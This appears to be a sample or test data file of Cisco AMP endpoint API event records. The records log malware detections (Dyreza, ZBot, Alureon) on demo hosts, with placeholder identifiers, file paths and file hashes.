-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257413683872000,"timestamp":1610705469,"timestamp_nanoseconds":56000000,"date":"2021-01-15T10:11:09+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257409388904508","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900267000300,"timestamp":1610705459,"timestamp_nanoseconds":267000000,"date":"2021-01-15T10:10:59+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"Eldorado:Alureon-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705459,"start_date":"2021-01-15T10:10:59+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5"},"parent":{"disposition":"Clean","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257357849297000,"timestamp":1610705456,"timestamp_nanoseconds":607000000,"date":"2021-01-15T10:10:56+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257357849296955","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667064295457000,"timestamp":1610705453,"timestamp_nanoseconds":478000000,"date":"2021-01-15T10:10:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533667064295456780","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257340669428000,"timestamp":1610705452,"timestamp_nanoseconds":988000000,"date":"2021-01-15T10:10:52+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257340669427770","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667055705522000,"timestamp":1610705451,"timestamp_nanoseconds":565000000,"date":"2021-01-15T10:10:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533667055705522187","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268414885822000,"timestamp":1610705411,"timestamp_nanoseconds":13000000,"date":"2021-01-15T10:10:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855181","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":810000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855180","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138.exe","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138.exe","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a","sha1":"e0feb4af86ef2f7a82e01b8704900e1e86c9e7a5","md5":"e74f1b3fffc4ae61e077bbdec3230e95"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5832268410590855000,"timestamp":1610705410,"timestamp_nanoseconds":779000000,"date":"2021-01-15T10:10:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"ZBot:FakeAlert-tpd","detection_id":"5832268410590855179","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Zbot","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b2:4b:d5:c2:a6:9f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"2_3756858138","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\2_3756858138","identity":{"sha256":"8db0d7f3a27291f197173a1e3a3a7242fc49deb2d06f90598475c919417a1c7a"},"parent":{"process_id":3020,"disposition":"Unknown","file_name":"a.exe","identity":{"sha256":"0723932d68702a59c4c8bf6a670a098cd55c39f4a3037fa8c2e6d2641fbfe85f","sha1":"5df10f3387f7ff512e420240f81bde68a2b4c7aa","md5":"9a2e18cb348feb772d02fb8f8728ab82"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257087266357000,"timestamp":1610705393,"timestamp_nanoseconds":942000000,"date":"2021-01-15T10:09:53+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257087266357305","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":469000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666798007484000,"timestamp":1610705391,"timestamp_nanoseconds":344000000,"date":"2021-01-15T10:09:51+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666798007484425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666793712517000,"timestamp":1610705390,"timestamp_nanoseconds":948000000,"date":"2021-01-15T10:09:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666793712517128","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666785122583000,"timestamp":1610705388,"timestamp_nanoseconds":372000000,"date":"2021-01-15T10:09:48+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666785122582535","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":596,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176257040021717000,"timestamp":1610705382,"timestamp_nanoseconds":304000000,"date":"2021-01-15T10:09:42+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176257040021717048","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256988482109000,"timestamp":1610705370,"timestamp_nanoseconds":292000000,"date":"2021-01-15T10:09:30+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256988482109495","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":782000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203910","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666703518204000,"timestamp":1610705369,"timestamp_nanoseconds":649000000,"date":"2021-01-15T10:09:29+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666703518203909","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533666694928269000,"timestamp":1610705367,"timestamp_nanoseconds":80000000,"date":"2021-01-15T10:09:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6533666694928269316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"},"parent":{"process_id":2204,"disposition":"Clean","file_name":"rundll32.exe","identity":{"sha256":"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124","sha1":"8939cf35447b22dd2c6e6f443446acc1bf986d58","md5":"51138beea3e2c21ec44d0932c71762a8"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256962712306000,"timestamp":1610705364,"timestamp_nanoseconds":286000000,"date":"2021-01-15T10:09:24+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256962712305718","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5825617250006073000,"timestamp":1610705347,"timestamp_nanoseconds":296000000,"date":"2021-01-15T10:09:07+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Eldorado:Alureon-tpd","detection_id":"5825617250006073346","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TDSS","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"c6:4e:72:6f:69:14"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tdss.exe","file_path":"\\\\?\\C:\\Documents and Settings\\admin\\Desktop\\tdss.exe","identity":{"sha256":"b75fd580c29736abd11327eef949e449f6d466a05fb6fd343d3957684c8036e5","sha1":"bc29f1e8460915596e1dcafd0c92d6309457d149","md5":"4a052246c5551e83d2d55f80e72f03eb"},"parent":{"process_id":1892,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"1e675cb7df214172f7eb0497f7275556038a0d09c6e5a3e6862c5e26885ef455","sha1":"9d2bf84874abc5b6e9a2744b7865c193c08d362f","md5":"12896823fb95bfb3dc9b46bcaedc9923"}}}}} 